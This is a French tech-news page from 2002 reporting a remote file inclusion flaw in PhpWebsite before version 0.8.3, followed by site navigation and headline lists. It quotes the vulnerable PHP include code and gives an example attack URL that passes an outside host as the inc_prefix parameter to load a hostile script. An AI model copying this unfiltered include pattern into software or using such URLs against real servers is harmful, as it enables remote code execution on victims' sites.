mardi 6 mai 2025
Une faille dans PhpWebsite
PhpWebsite est un outil qui permet aux développeurs de créer des plugins en php. Cependant, une faille de sécurité a été découverte : les versions avant la version 0.8.3 permettent l'exécution de n'importe quel script...
D'où vient la faille ? Du fichier modsecurity.php :
global $inc_prefix;
if(!$inc_prefix)
{}
include_once($inc_prefix."htmlheader.php");
Comme vous le voyez dans le code, aucun filtre n'a été prévu, offrant donc une faille grosse comme une maison en fournissant comme paramètre un chemin vers un script mal attentionné (ex : http://serveur.com/include_once.php?inc_prefix=http://www.tout-casser.com/
Source : Yacapa.com
Dans les boutiques
> Aucun commentaire posté pour le moment. Soyez le premier à réagir...
Rédigée le vendredi 27 septembre 2002 à 23h56 par
Michaël Mulkens
Source : infomods
Il n'y a encore aucun commentaire posté
Les commentaires anonymes sont permis, mais il est préférable de s'identifier ou de s'inscrire.
Les principaux bbcode : souligner - gras - italique - www - email - image - citation - code
Plus d'émoticones
Actualités relatives
15/12 - Dix ans de chasse aux pirates : l'intern...
29/08 - Un cheval de Troie déguisé en mise à jou...
18/08 - Un nouveau procédé inédit pour le phishi...
14/08 - Après CNN, un cheval de Troie se prend m...
31/07 - Un cheval de Troie dans un message d'UPS
29/07 - Un million de malwares détectés sur inte...
28/07 - Les utilisateurs de Paypal à nouveau la ...
23/07 - Quatre ans ferme pour le roi du pourriel
18/07 - Sécurité, cyber-criminalité : Etat des l...
09/06 - Top 10 des menaces de mai 2008
02/05 - Les spams ont 30 ans, bon anniversaire !
23/04 - Les virus, toute une histoire !
18/04 - Condamnations pour arnaque au minitel
11/04 - Le bordel en 2008 pour les programmes ma...
20/03 - McAfee teste les adolescents
Pas d'article relatif, voici néanmoins nos derniers articles
Nouvelles plus récentes
29/09 - 15:19 - Test du Antec 3-led
29/09 - 19:40 - Visitez notre forum, il a de plus en plus de su...
30/09 - 20:27 - Système de refroidissement par Heat-Pipe
01/10 - 20:51 - Athlon XP 2800+ en test
02/10 - 10:49 - DDR-II pour carte graphique, pas avant 2003
02/10 - 19:19 - test ventillo evercool
03/10 - 19:29 - plexi and led
04/10 - 16:27 - Test Enermax CS-501
04/10 - 19:26 - Nouveau virus
06/10 - 14:32 - Le mod le plus cher du monde !!!
07/10 - 18:42 - Radeon 7500 PCI au japon
07/10 - 18:50 - Nouveau logo intel pour l'HT
09/10 - 16:11 - Test de la MSI GeForce 4 MX440 AGP 8x
09/10 - 16:20 - Premier lecteur dvd de salon compatible DivX
14/10 - 19:36 - NV30 à 400 MHz ???
Nouvelles plus anciennes 
27/09 - 23:33 - Philips et la RIAA... la guerre serait-elle déc...
27/09 - 21:40 - Une version payante de Kazaa ?
27/09 - 12:20 - Test de 8 alimentations silencieuses
25/09 - 17:58 - NV18 chez Inpact
25/09 - 17:16 - Project IGI 2 - Nouvelles images
24/09 - 18:45 - Splendide mod !
23/09 - 22:23 - Spécification des radeons 9500
23/09 - 21:55 - Test du iomega zip 750 Mo
23/09 - 21:24 - L'alimentation !!!
23/09 - 20:40 - Kazaa 2,0 est la !
23/09 - 20:12 - Dans la boite...
23/09 - 19:58 - Test LCD Matrix Orbital (en)
23/09 - 19:12 - Neon bi et tri color
23/09 - 01:28 - Hercules 9700 Pro enfin disponible
22/09 - 21:05 - Alim silencieuse
COMMENTAIRES :
Suivre l'évolution des commentaires de cette actualité via le flux rss 